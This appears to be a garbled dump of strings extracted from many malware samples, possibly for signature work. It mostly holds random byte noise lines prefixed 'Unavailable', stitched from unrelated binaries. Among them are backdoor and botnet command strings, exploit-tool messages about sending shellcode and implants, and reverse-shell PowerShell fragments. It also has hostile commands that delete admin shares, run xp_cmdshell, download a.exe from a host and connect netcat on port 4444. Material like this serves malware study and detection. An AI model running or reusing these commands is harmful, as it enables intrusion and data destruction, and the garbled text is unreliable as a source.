Unavailable %s <proxy ip> <proxy port> <target ip> <target port> <cmd> [arg1 cmd] ... [argx cmd][-] error in connection() %d - %s[-] child process exit.post http://%s:%s/ http/1.1pipe() topipe() frommiiepqibaakcaqea4lsvv/w1mkz38q3z+ezjbzranzkrlxee6/uxwl67ytokf2nniaes3cca4wli6+9cigx8saixd5oezhvi1jza61z/flsqcc1ip//gjvt16nrx3s9z%windir%\\ativpsrz.bin%windir%\\ativpsrn.bink
Unavailable l98u&h
Unavailable a_a^]
Unavailable w i
Unavailable mkyv
Unavailable ?_%up
Unavailable }+-=
Unavailable miniasp3\\release\\miniasp.pdbhttp://%s/about.htmhttp://%s/result_%s.htmopen internet failed
Unavailable 6q`h
Unavailable [aoni*{
Unavailable .rdata
Unavailable m{wy
Unavailable ku0%
Unavailable m-jx
Unavailable oor#
Unavailable x]|u
Unavailable l$,sq
Unavailable mgetinstancew
Unavailable std::nullptr_t
Unavailable t$ph
Unavailable tk_ve
Unavailable q01wb
Unavailable ;ipq
Unavailable hint: '
Unavailable }#m{
Unavailable v3:zl)
Unavailable @8l$8t
Unavailable !4xc?
Unavailable ;|z>
Unavailable lockresource
Unavailable pe-protect 0.9 (c)o
Unavailable wqd%
Unavailable }*@fr
Unavailable r#f;\$\s
Unavailable 7mom
Unavailable i/^gz
Unavailable a_a^a]a\_^[]
Unavailable aqqqqiqj
Unavailable rd_+0
Unavailable k+n(ia!b*
Unavailable pebi
Unavailable 2l5v
Unavailable `,f~
Unavailable jx 2
Unavailable t[s5
Unavailable &v1~
Unavailable %'wk
Unavailable botnetcmd:012345678901234567890
Unavailable t%d;
Unavailable t~dd"
Unavailable `template static data member constructor helper'
Unavailable (%\,
Unavailable createfonta
Unavailable id-at-postaladdress%
Unavailable 7~h~
Unavailable 2pfe
Unavailable c:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdbd:\\proj\\cn\\fa64\\sengoku_win32.sys\x00rk_ntsystem.c\\uroboros\\shell.{f21edc09-85d3-4eb9-915f-1afa2ff28153}
Unavailable eqw6sz
Unavailable <e?k
Unavailable &vkcjl
Unavailable x_j"<
Unavailable loadlibraryexw
Unavailable 8:jup
Unavailable #xz]
Unavailable log10f
Unavailable ]sn6,'
Unavailable b.>k
Unavailable d$<j
Unavailable q+y,0x
Unavailable jom0/
Unavailable jel?
Unavailable e+xo[
Unavailable bksu{
Unavailable t)d8l$@t
Unavailable +/:<
Unavailable l$ f
Unavailable sd+$
Unavailable 1&8a
Unavailable ~o<xbse
Unavailable |$p-
Unavailable rmy7!
Unavailable krdou:
Unavailable :)np
Unavailable rkzk
Unavailable leavecriticalsection
Unavailable complete object locator'
Unavailable lsrx
Unavailable 0%ho
Unavailable uh%1
Unavailable ,\9r`ne
Unavailable y".o
Unavailable cryptprotect_promptstructdiscomousegetdeepinfoaes_encryptstartudpfloodb
Unavailable vqn0
Unavailable 6666
Unavailable g>=)-
Unavailable @xqs
Unavailable {>3vy
Unavailable dddd+proxy-auth:h
Unavailable vgu1m*
Unavailable )tx'
Unavailable |$@-d
Unavailable writeconsolew
Unavailable in27
Unavailable yitk
Unavailable k&2#
Unavailable s,v%
Unavailable wmplog21t.sqmwmplog15r.sqmwmplog09c.sqmkbd_%%s_%%02d%%02d%%02d%%02d%%02d.cat:l1\ndel \"%s\"\nif exist \"%s\" goto l1\ndel \"%s\"\n\" goto r1\ndel /a \"@echo off\n:r1\ndel /a \"*
Unavailable |t`h
Unavailable h #@
Unavailable v9d
Unavailable 3f_a
Unavailable ddos.tf
Unavailable @h%e@
Unavailable rvl3/)r
Unavailable 4=*dpw
Unavailable nan(ind)
Unavailable shell32.dllr
Unavailable wf=%
Unavailable gqcffc
Unavailable hmhpd
Unavailable i)@c
Unavailable $uv3
Unavailable 1xn5&
Unavailable can't load this dll ! :(
Unavailable b&h2q
Unavailable r:d8v
Unavailable 4vw3
Unavailable b{d3:
Unavailable ^%^9&
Unavailable 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
Unavailable __getmainargsws2_32.dllwininet.dllfreesidtoasciiredirect sport remotehost rport -->port redirectorpost /scripts/wwpmsg.dll http/1.0http://ip/a.exe a.exe -->download a filehost: wwp.mirabilis.com:80%s -set port portnumber -->set the service portshell -->get a shelldeleteservice servicename -->delete a servicegetting the username(%c%s%c)-->id(0x%s) successfully%s -set servicename servicename -->set the service name[validaterange(1, 65535)]$client = new-object -typename system.net.sockets.tcpclient$buffer = new-object -typename system.byte[] -argumentlist $client.receivebuffersizei
Unavailable 6"h
Unavailable mnx'
Unavailable jrzi
Unavailable evcode
Unavailable d$4pv
Unavailable bqtc
Unavailable 00dco
Unavailable bm>:
Unavailable {b*t
Unavailable l$ +
Unavailable vhd)7
Unavailable o(tu
Unavailable ymlb
Unavailable &sjs
Unavailable @85{
Unavailable 7r16
Unavailable %wy;+
Unavailable c0>[s
Unavailable t-zaff
Unavailable 5_rej
Unavailable `user
Unavailable |$ atavawh
Unavailable bf>^g
Unavailable u=r#
Unavailable avcsetiricontrol
Unavailable 4gz>p
Unavailable --rw
Unavailable ys,/
Unavailable ^u'w
Unavailable d$4f;
Unavailable ftell
Unavailable l){li
Unavailable r"@$
Unavailable cqwzr=
Unavailable "v_<
Unavailable 6m
Unavailable hrhg
Unavailable )q*1
Unavailable l:- a
Unavailable :tov
Unavailable u)(h
Unavailable _4{/
Unavailable clbcaiq.dllprofapi_104/showwu
Unavailable rs)>*
Unavailable p.ip
Unavailable ,e m
Unavailable coded by flashget_grbtoolsscaningcrackingrestore=1thread=running=1checkcombination=autosave=1.000000tryconnect=tray=programming by jd glaser - all rights reservedusage - hunt \\\\servername.
Unavailable h!8~
Unavailable %zgv
Unavailable /u-*s:
Unavailable xvbcn
Unavailable {%#,!
Unavailable h98u
Unavailable fffffffff
Unavailable aportions copyright (c) 1983,99 borland
Unavailable searchinjectinject base:searcher.dlldmpz.log/api/process.php?xy=user-agent: pcicompliant%s:*:enabled:%starget pid:scan all processes:<pid> <pattern>\\svhst%pceh_3\\.\\ceh_4\\..\\ceh_6yatoed3fe3rex23030am39497403poo7lo276670173quai16568unto1828oleo9eds96006nosysump7hove19commonfile.execallimage.exeburpswimwork\\project\\loadworthisnalftp -s:%s\\system32\\winxml.dlltor -f <torrc>tor_umemscanchewbac3
Unavailable tsr#
Unavailable j{wu/$
Unavailable j4mj#
Unavailable match operate system failed, 0x%00004x:%u:%d(window:ttl:df)example: xport www.xxx.com 80 -m syn%s - command line port scannerxport 192.168.1.1 1-1024 -t 200 -vusage: xport <host> <ports scope> [options].\\port.iniport scan complete, total %d port, %d port is opened, use %d ms.http://www.xfocus.orgp
Unavailable a>rw,
Unavailable aplib v0.43 - the smaller the bettermsrv.dll
Unavailable hq0@
Unavailable ?<oy
Unavailable ~ay5
Unavailable h*ur
Unavailable r36f
Unavailable i7h)
Unavailable d$8hco(h
Unavailable -^,y(
Unavailable a3gug
Unavailable uhglg
Unavailable e4xh
Unavailable regqueryvalueexw
Unavailable s=rp
Unavailable r(dbk
Unavailable xpdo|
Unavailable }nan
Unavailable _j9tj
Unavailable j5k%f
Unavailable b;t$
Unavailable %8@@
Unavailable |0,ei
Unavailable t6yb\
Unavailable xwok
Unavailable regsetvalueexa
Unavailable a_a^a\
Unavailable enter your own password here
Unavailable fcxvq
Unavailable )cl0o
Unavailable t[a+
Unavailable iz00dcy
Unavailable a='r
Unavailable #^}qd
Unavailable ef?}
Unavailable pqrv
Unavailable "yq\z
Unavailable j00dc
Unavailable ):xy3
Unavailable a/]j w
Unavailable $[q_
Unavailable <<<<<<
Unavailable &iiu
Unavailable @dfi
Unavailable pko^o
Unavailable <description>bytelinker.com</description>myupnp.exec:\\users\\tong\\documents\\visual studio 2012\\projects\\shift shellc
Unavailable <i,,
Unavailable findwindowa
Unavailable k8@h
Unavailable @8|$pt
Unavailable standard jet db
Unavailable rqgnz
Unavailable %gm_
Unavailable ctfmon.exed:\\0.work\\0.coding\\0.workspace\\downloader\\release[proto] [local address] [l port] [remote address] [r port] [state]last-error code\x000h
Unavailable |yn@
Unavailable shell started,wait to terminate it.....pksignclass/writepolicy.classjavatool.classsbt/compiler/pkm4
Unavailable zj=@
Unavailable ytuw
Unavailable h@cc
Unavailable %/39
Unavailable 6$hf
Unavailable k(e%tpx
Unavailable [vai
Unavailable \$8h
Unavailable .entnz
Unavailable !(i]-
Unavailable _q2v
Unavailable t+pyf{
Unavailable windows suxx!u
Unavailable a125
Unavailable f9<0t
Unavailable r/8s
Unavailable bad packet\
Unavailable |$h3
Unavailable <g3+%
Unavailable w:w{
Unavailable >n\x
Unavailable ddll
Unavailable ttmm
Unavailable u^;9i#z
Unavailable =]in
Unavailable k;"m
Unavailable +1?nb
Unavailable 1z/.i
Unavailable i[4t[
Unavailable \\\\%ls\\%lsdumpel -f file [-s \\\\server]records will not appear in the dumped log.obj\\i386\\dumpel.exedumpel usage: wcw3wdwaw2wnw@wewzw2wdwewbwzwfwfw4w2wzw5w1w4wfwzwgwowgwgwew5w2wfwgwdwfwoww+w;w2w0w6w4w.w(wrw
Unavailable h9ds`
Unavailable xs~g
Unavailable 6y=:nn
Unavailable l$0sq
Unavailable _&nsz
Unavailable .icmgq
Unavailable elc"
Unavailable <?t$</u
Unavailable ;the comment below contains sfx script commandspath=%temp%w
Unavailable rt`a
Unavailable wsa?
Unavailable xfk?1bz
Unavailable /i;}
Unavailable gettfuckyou
Unavailable >uoz
Unavailable >rnpix
Unavailable gib+v
Unavailable ,!e^~'
Unavailable q0"v
Unavailable [,2i+.
Unavailable *$zt<
Unavailable \x00netpass update\x00\x00%s:download\x00\x00%s:update\x00\x00%s:uninstall\x00?injectdll@@yahpauhwnd__@@k@z?unmapdll@@yahxz?g_bsubclassed@@3haacfg92kxpcso4y94bnurfmnnk27ehw6cqp5entad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75baa77c842be168b0f66c42c7885997b523f63566f407f3834bcc54aaa32524svwf
Unavailable qnu]'
Unavailable %x~z
Unavailable tgwyugwqswvwnguenumlocalreswnetopenenumw
Unavailable o u!
Unavailable )iqn
Unavailable >$tn-
Unavailable -[,1k
Unavailable (null)
Unavailable w0 a$
Unavailable 8mzt
Unavailable dkp}
Unavailable ba{yhx
Unavailable us*t
Unavailable #x(m^j
Unavailable 1-]?
Unavailable l@6
Unavailable vwsu
Unavailable s1^<"
Unavailable 9mp;
Unavailable }{r3
Unavailable '\http://%s/~%s/cgi-bin/%s.cgi?%sh
Unavailable tib}
Unavailable c,o:w
Unavailable *=iv
Unavailable {,o<
Unavailable tch;
Unavailable cal$q
Unavailable d$$h
Unavailable qtvbm
Unavailable -comlock-
Unavailable base class descriptor at (
Unavailable mbug
Unavailable mxvg
Unavailable d>(l
Unavailable "r%o
Unavailable ydss
Unavailable n&})dp
Unavailable -h858op561-0p
Unavailable d$ f
Unavailable 10z/s
Unavailable cp28
Unavailable #5;l
Unavailable xyr?
Unavailable !b7/
Unavailable ab:h
Unavailable ca.dlls
Unavailable ,0 f
Unavailable <*6rl`
Unavailable ?:kp<
Unavailable "~vu
Unavailable h7+x)wt
Unavailable ~hxa
Unavailable >glg
Unavailable v=]:
Unavailable [;zx
Unavailable hj l
Unavailable u.am
Unavailable |$dh
Unavailable t$ e3
Unavailable c].awaw
Unavailable vg\q
Unavailable 79vu
Unavailable a,1,9
Unavailable g~vh9
Unavailable 2tk
Unavailable fgdump\\pstgdumpchgxp.vbsofficekey.exefindkey.exexpkey.exediablohornprocess memory dumperpid-%s.dmppid %d in not acessiblememdump.exe%s-%d.dmpblazingtools.comk
Unavailable ,nl0
Unavailable ,0pt
Unavailable dg|$
Unavailable &9jb
Unavailable \hss
Unavailable releasedc
Unavailable 9r32
Unavailable a h;
Unavailable probe #2 usage: %s -i targetip -p targetport -r %d [-o timeout] -t protocol -n imailusername -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
Unavailable t$0h
Unavailable 4o`<'
Unavailable >=tz
Unavailable \%d%hx
Unavailable hqy5
Unavailable y#"`
Unavailable st{;
Unavailable m%l"
Unavailable f`&`
Unavailable ?v|z
Unavailable winhttpgetieproxyconfigforcurrentusermeterpreter_uaget /123456789 http/1.0c:\\users\\logintech\\dropbox\\projects\\new folder\\latest\\benchmark\\benchmark\\obj\\release\\benchmark.pdbrunpe1082b8c7d3f9105dc66a7e3267c9750cf43e9d325$374e0775-e893-4e72-806c-a8d880a49ae7monitorinjectionnanocore.clientpluginhosticlientnetworkhost#=qjgz7ljmpp0j7fvl9dmi8ctjildgtcbw8jyuc6gc8mej9b11crfg2djxcf0p8pzget
Unavailable 8rz1
Unavailable s7d"
Unavailable mj$>
Unavailable 0qf_s
Unavailable m1%t
Unavailable 7zb@
Unavailable 0a_a^a]a\_
Unavailable }_<l
Unavailable (h>?z
Unavailable r#xh
Unavailable ersingscandelete-tcbtime-wait1last-aclosing!fin!syn-receiv%cget %s 's password error!software\\microsoft\\active setup\\installed components\\{e3df6b419d1f}<start application 2 key><start application 1 key><select media key><start mail key><play/pause media key>0
Unavailable 0x01, first info.ksstcreator.pdbskg(3)=&3.2d_u1
Unavailable cdxafmtu
Unavailable g`uiv
Unavailable xsvw
Unavailable d{h}
Unavailable \\.\hardlock.vxd
Unavailable u1!d$0h
Unavailable jb9ww+3
Unavailable sj@h
Unavailable x9pi
Unavailable p,'r
Unavailable vqpw
Unavailable --------------server info---------------------------------soft info---------------------------------ip config-------------------------------------------- ports & proc -------------------------regrun ok!can't init api\x0d\x0acan't copy file to appdata.%daleady in appdata path.can't get moudule file namecan't find environmentvariablecreateprocess error ( %d:%s )createprocess success!can't open mmfile %s.%d.%-20s :%-5s %-16s %5d %-s%-4d udp %-20s :%-5d%-20s :%-5d %-16s %5d %-s%-4d tcp %-20s :%-5d-------------
Unavailable r=vg
Unavailable y210
Unavailable dob.
Unavailable |xgi
Unavailable ha;x
Unavailable iv`i
Unavailable wj<1uh6fl-udb9iavo<rus)sofjh{_/f3e 03v<description> windows system utility service </description>w
Unavailable t=z8
Unavailable xeui
Unavailable %@@@
Unavailable "s>n
Unavailable ec|v
Unavailable $d_y"
Unavailable 00dci
Unavailable 6|>^|ev
Unavailable t$hl
Unavailable fyng
Unavailable registerclassexa
Unavailable ma*>
Unavailable .<ww
Unavailable 'bxf
Unavailable b+ko
Unavailable 8[rs
Unavailable ff9<qu
Unavailable [y=:o=
Unavailable f{gw*)
Unavailable tpuq
Unavailable hax3
Unavailable {t6b
Unavailable m&gx^dsf&da@fsafetyssl.security-centers.comwthkdoc0106test-b7fa835a39/%s?rank=%smodulestart\x00modulestop\x00start1156fd22-3443-4344-c4ffffread\x20file\x2e\x2e\x2e\x20error\x00\x00
Unavailable ]r0j
Unavailable ]zy[^_
Unavailable 3333+
Unavailable 1!tnw
Unavailable g5hj
Unavailable hhq@
Unavailable &\26b+a
Unavailable uam)
Unavailable >dph
Unavailable ya*l
Unavailable t$@i
Unavailable an 1
Unavailable 4#y"qt
Unavailable :1`~
Unavailable aa,a$
Unavailable [-] failed to mmap file: %s[!] value has size of 0!forceprismheader[+] looking for vulnerable socketcan't use 32-bit exploit on 64-bit target[+] %s socket ready, exploiting...[!] nothing looks vulnerable, trying everythingkernel has 4g/4g split, not exploitable[+] kernel stack size is %d[-] failed to prepare payload!shellcodestartoffset[*] waiting for authcode from exploit[-] connection closed by remote host (tcp ack/fin)[!]warning: error on first request - path size may actually be larger than indicated.<http://%s/%s> (not <locktoken:write1>) <http://%s/>[+] target is %s[-] error appending shellcode buffer[-] shellcode is too big[+] exploit payload sent![+] bound to dimsvc, sending exploit request to opnum 29[+] connected to target %s:%d[-] build_exploit_run_x64():[%s] - error upgraded dll architecture does not match target architecture (0x%x)[%s] - error building dll loading shellcode[+] shellcode callback %s:%d[+] exploiting target[+] ping returned target architecture: %s - xor key: 0x%08x[.] sending shellcode to inject dll[-] error setting shellcodefile name[-] unable to connect to broswer named pipe, target is not vulnerable[-] unable to bind to dimsvc rpc syntax, target is not vulnerable[+] bound to dimsvc, target is vulnerable[+] target is vulnerable to %d exploit%s[!] a vulnerable target will not respond.[-] target not vulernable[-] touching the target failed![-] os fingerprint not complete - 0x%08x![*] failed to detect os / service pack on %s:%d[*] smb string: %s (%s)[-] get remotemoftriggerpath error[-] %s - target might not be in a usable state.[*] exploiting target[-] encoding exploit payload failed![-] the target is not vulnerable[+] the target is vulnerable[-] are you being redirectect? need to retarget?[+] iis target os: %s[*] summary: %d pipes found[+] testing %d pipes[-] error on smb startup, aborting92a761c29b946aa458876ff78375e0e28bc8acb0h
Unavailable ra(
Unavailable t$$h
Unavailable ox[*
Unavailable le]?
Unavailable wkmz
Unavailable @ah;
Unavailable wh_keyboard_llwsock32.dllwininet.dll\\chicken\\release\\svchost.pdb\\intergratechk\\release\\intergratechk.pdbfake.cf8.8.8.8processor(%d)\\dbprotectsupportdm1712/`jvpnpkte/bplinstallservice npf %d68961installservice dbprotectsupport %dc:\\program files\\dbprotectsupport\\npf.sysfake.cfgthreadattack.cppfake.cppdns_arraydomainrandexcpu %llu %llu %llu %llu[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %scoded by brian krebs for personnal use only. i love my job & wife.http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php%botid%%botnet%bc_removebc_addhttp://www.google.com/webhpcoded by brian krebs for personal use only. i love my job & wife
Unavailable @y8e~
Unavailable /churraskito/-->this exploit gives you a local system shell~ ms10_048 x64 exp ~
Unavailable j/v/1
Unavailable ?<ssylkaustanavlivatpoluchitpereslatderzhatvykhoditnachaloh
Unavailable uoh4xc
Unavailable t$xf;
Unavailable 4]5t
Unavailable c/[;3
Unavailable f.wv
Unavailable s<}ek
Unavailable .?avtype_info@@
Unavailable t7d+
Unavailable citadel hooking error[%s]: checking \"ftp account: ftp/ftp@ftp.net\" ...[%s]: ipc null session connection success !!!scan %d targets,use %4.1f minuteshttp://blog.gentilkiwi.com/mimikatzbenjamin delpyglobalsignc
Unavailable j/0a
Unavailable 67t]?^
Unavailable dddd, mmmm dd, yyyy
Unavailable ntwdblib.dllt
Unavailable r\kmwmbk\r
Unavailable dc{}$
Unavailable z@ml
Unavailable .}4nscq
Unavailable esamsrv.dllhookdc.dllcdlocatecsystemsamiretrieveprimarycredentialssamiretrievemultipleprimarycredentials3
Unavailable t$(qr
Unavailable zcl}
Unavailable tbts9abp
Unavailable rar configmz
Unavailable |$8i
Unavailable &|fmq
Unavailable vu~u
Unavailable gm6^=
Unavailable j7e27b224ea15b787a428dcfe47a7216b3da9c447ac522deb" // key="system323bcd1fghijklmabcdefgh-j+lmnopq4stuvwxyznopq7stuvwxyz0e2ar56r89k/9c886aad51ac7356" // key = "hongkongw8rt$3%cnpost^~qdkwero38oera^t@#
Unavailable [-at
Unavailable r!sc
Unavailable jk6illp
Unavailable !ddedata initialized (ansi), app strings are '%s' and '%s'
Unavailable wcbg
Unavailable %dts
Unavailable <:l*
Unavailable -)tw!
Unavailable @recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emcfgv7xc8itavgn0bmf!ctrhfex5m9jnzddfpk!vwbebxyx1nzrckblgqoiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"mail from:<subject: %s|%s|%s
Unavailable d>ax
Unavailable noobyprotect se 1.1.1.0
Unavailable b$mm
Unavailable rqtc
Unavailable pzlz
Unavailable >f;}
Unavailable yb:}
Unavailable gdi32.dlla
Unavailable iyuv
Unavailable t!a;
Unavailable @ssf
Unavailable d88tt3
Unavailable @"k
Unavailable u<ru7.g^
Unavailable -?:w#h(
Unavailable /w*|u
Unavailable t33x
Unavailable $ayy
Unavailable &xa:^
Unavailable 'l*v
Unavailable rab3g:sun:sunday:mon:monday:tue:tuesday:wed:wednesday:thu:thursday:fri:friday:sat:saturdays
Unavailable tooel\
Unavailable (t$
Unavailable ]j\g
Unavailable [&.dhx
Unavailable projectdatadescryptokeepaliveipnetrowlogclientmessage|clienthostget_connectedco$
Unavailable \v$i
Unavailable wv5u15v
Unavailable gk${
Unavailable 8]z-
Unavailable p,~a
Unavailable 3.fuxloadlibrarya
Unavailable zlcs
Unavailable =a=@
Unavailable ,xsa
Unavailable 9vu
Unavailable b;9f
Unavailable @a_a^a]a\_
Unavailable 00dc:
Unavailable \ v#
Unavailable l$ e
Unavailable ctpy
Unavailable ]=vs
Unavailable -00dcx
Unavailable xgmlk
Unavailable j01wb
Unavailable i*\_
Unavailable (ykx
Unavailable 9),t-
Unavailable 500dc/
Unavailable uconsolasclun
Unavailable v6r
Unavailable @cg(
Unavailable o/6(9
Unavailable local variable used before initialization
Unavailable `q)l
Unavailable dn2h
Unavailable wiib
Unavailable hqcvi k
Unavailable l$de
Unavailable %)+/5;=cgiosyaegkmq
Unavailable h%e@
Unavailable $kvu
Unavailable raw_open createfile error\
Unavailable ap0calypsesifremsggosterbaslikdosyalarsinjecsiyoncvu3388fnek3w(3ij3fkp0930dizingawi2clweblightgoldenrodyellowa
Unavailable ih*?
Unavailable idx1
Unavailable t$8vr
Unavailable f'`@
Unavailable t?e;
Unavailable srsh
Unavailable }unk
Unavailable fd9<au
Unavailable xk+m=e^
Unavailable invoke-bypassuacs
Unavailable cy?>p
Unavailable `managed vector copy constructor iterator'
Unavailable s4"@
Unavailable ;mzt
Unavailable zt*$9
Unavailable ,y[ul
Unavailable tfsh
Unavailable 2c5"ml;
Unavailable getdc
Unavailable uwvrqsp
Unavailable _*b:
Unavailable jfh#
Unavailable j465
Unavailable rwb0n
Unavailable post http://%ls:%d/%x http/1.1%%temp%%\\%s_p.ax%temp%\\uid.ax%%temp%%\\%s.axsysinfo\x00sysbin01\\flashupdate.exerat_uninstall!! use splice socket !!user-agent: sjzj (compatible; msie 6.0; win32)g_nav=%d,hwnd:0x%x,classname:%s,title:%s,(%d,%d,%d,%d),bool=%du4(ueknmiq/'p_9pjmficmp.dlleg}qaptsjwj:uo2nqpp2}w8weilqkc:lf1yzmka
Unavailable ]ye88
Unavailable 35/6pt
Unavailable jisz_+2
Unavailable xm)u
Unavailable fhyy
Unavailable n({d8
Unavailable k\0b8
Unavailable "if{_1
Unavailable r;0\
Unavailable lv.<
Unavailable 'byq
Unavailable ydph
Unavailable aq$d
Unavailable h+o`
Unavailable ox4l<
Unavailable h:beh
Unavailable gif89unlock\\i386\\hello.pdbos not supported.n
Unavailable "3g@l
Unavailable zyt&f
Unavailable http://google.com/mozilla/5.0 (compatible; msie 9.0; windows nt 6.1; wow64; trident/5.0; malc)o
Unavailable ~>-_ l
Unavailable ?getpu@
Unavailable s`}/
Unavailable isvalidcodepage
Unavailable getsystemmetrics
Unavailable dwiy{s
Unavailable +bcq-
Unavailable ;za^
Unavailable `z|s
Unavailable !n+c
Unavailable e`g5j
Unavailable |vxv
Unavailable l$@e3
Unavailable ,i<%w
Unavailable -w2[
Unavailable p,^aq
Unavailable d$8d8t$8u_h
Unavailable 5bo5
Unavailable m@~0
Unavailable !~~@uz
Unavailable e!)e<
Unavailable qjqh
Unavailable enddialo
Unavailable wavefmt
Unavailable http/1.0mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.8.0.6) gecko/20060728 firefox/1.5.0.6callback[0]callback[1]callback[2]callback[3]callback[4]mtbtr-dwevckpba.dat+rrror oogin as %sid=%s,oemcp=%d,acp=%d002 termsrv=%d002 inject=%s002 sleep=%d002 cbm=%d002 callback[4]=%s002 callback[3]=%s002 callback[2]=%s002 callback[1]=%s002 callback[0]=%s002 ramfree=%dmb002 ram=%dmb002 cpu=%s002 ipaddress=%s002 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
Unavailable l$(3
Unavailable @usvwatavawh
Unavailable m34j
Unavailable bydwing@
Unavailable qh?w
Unavailable k5w?,~r
Unavailable tme3
Unavailable g7t=
Unavailable watawh
Unavailable <nu'
Unavailable 2#;p"
Unavailable authtype: .
Unavailable $*vks
Unavailable =r@@
Unavailable j:\\chong\\nod\\release\\sslmm.exen
Unavailable ;h9>&x
Unavailable ;rhp
Unavailable hqnp
Unavailable 6];f
Unavailable !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unavailable |ov!
Unavailable d$ h
Unavailable fg0t
Unavailable +eoaba
Unavailable 3tnm1`i
Unavailable varus_service_x86.dll/s %s /p %d /st %d /rt %dnet start %%1ping 127.1 > nulmcinitmispalertexsc start %%1net stop %%1workerrundnsapi.dllsoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\%sconnect %s:%d http/1.1connect %s:%d http/1.1mozilla/4.0 (compatible; msie 9.0; windows nt 6.1; trident/4.0;)iphlpapi.dll%systemroot%\\web\\proxy-authorization: negotiate %sclsid\\{%s}\\inprocserver32b_wkndnsk^rundll32 \"%s\",%s/c ping 127.%d & del \"%s\"runmebydll32s
Unavailable {mdo
Unavailable d$@e
Unavailable dsvwf
Unavailable v18=
Unavailable 3vqi
Unavailable f?f?4s
Unavailable (d$0fa
Unavailable f}rn
Unavailable p]1b
Unavailable y],bzyj
Unavailable uihe}
Unavailable |$pl
Unavailable setx tor_control_passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
Unavailable )=}w;
Unavailable ei*0d
Unavailable 7;oi
Unavailable (%]g
Unavailable ~yl01wb
Unavailable a|[ib
Unavailable 9g](3
Unavailable h0vc
Unavailable t$ m
Unavailable h9rm
Unavailable #lkwq
Unavailable 0fz`
Unavailable ~~&,
Unavailable getproc
Unavailable a kv
Unavailable u&wvs
Unavailable j&@}r
Unavailable \e=z
Unavailable }6sr
Unavailable }k9r
Unavailable %sw7e89.tmp%ssvchost.exe
Unavailable d3m|h\
Unavailable 5ku01wb
Unavailable 8=+l
Unavailable +t~t~
Unavailable j"arza2
Unavailable r6]kc
Unavailable shortinfoharvestercmd.dllwin32_systemenclosuregetfilecmd.dll<
Unavailable ^l5`gr
Unavailable #00dc
Unavailable _`g~
Unavailable lcmapstringw
Unavailable eib|
Unavailable delete
Unavailable r;'1d
Unavailable =uia_u
Unavailable ?]in
Unavailable 75o;
Unavailable yo/,
Unavailable rn$b
Unavailable t`,
Unavailable $`pg%
Unavailable suv3
Unavailable qtvj@
Unavailable o"g>
Unavailable uyhc
Unavailable eym$
Unavailable t$$qr
Unavailable w[4\#
Unavailable kppp
Unavailable !ia|b
Unavailable jmfq
Unavailable (z=`
Unavailable j)ul
Unavailable 00dcg
Unavailable 4foyg
Unavailable .\ft3
Unavailable !)'syw
Unavailable l$8m
Unavailable (!jyf
Unavailable 0&qc
Unavailable "x#;-
Unavailable zk]p
Unavailable .net clr 2.0.50727) havijitsecteam.comr3dm0v3goingbacksoongoingbacksoon1goingbacksoon
Unavailable ?ri-
Unavailable dj]/
Unavailable ht@c
Unavailable \\\\%s\\ipcs.exe %s %s %s %s %d /saves.exe start error...%dexec sp_addextendedproc xp_cmdshell,'xplog70.dll'exec master..xp_cmdshell 'wscript.exe cc.js'usage:sql.exe [options]%s root %s %d errorpass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del 